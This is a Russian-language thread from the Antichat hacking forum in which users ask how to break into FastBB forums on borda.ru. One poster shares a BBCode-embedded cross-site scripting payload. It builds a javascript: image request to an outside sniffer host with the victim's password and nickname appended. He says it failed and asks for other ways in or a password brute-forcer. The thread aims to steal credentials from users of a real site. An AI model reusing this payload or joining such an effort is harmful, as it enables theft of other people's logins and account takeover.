Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Обзор уязвимостей FastBB (https://forum.antichat.xyz/showthread.php?t=29119)

Dr.Frank 14.12.2006 20:16

Обзор уязвимостей FastBB
 
Знает ли кто-нибудь уязвимости в форумах FastBB? точнее в тех, что стоят на borda.ru?

Pashahak 16.01.2007 14:18

Хдопцы, а действительно, возможно ЛИ это сделать? А если возможно, то как? Всем известно что в фастББ пароли храняться в открытом виде. Я пробовал сплоита залить такого:

[font color=[img src=http://s.netsec.ru/s.gif/style=display:none;background:url(javascript:docum ent.images[1].src="http://s.netsec.ru//s.gif?id=79 &"+pass+nick); ]][/font]

А потом со сниффера прочитать пасс. ( про этот сплоит с видео узнал ) тико тама он почему-то не срабатывает. И другим пользователям виден этот скрипт в НЕ зашифрованном виде. Мож еще как-то можна хоть что-то вытянуть. А мож переборщик паролей какой-то есть? Я уже все надежды потерял. А писал к администрации www.borda.ru так там говорят что форум вообще не имеет ни одной уязвимости. Мож кто все-таки что-то знает?


Время: 01:24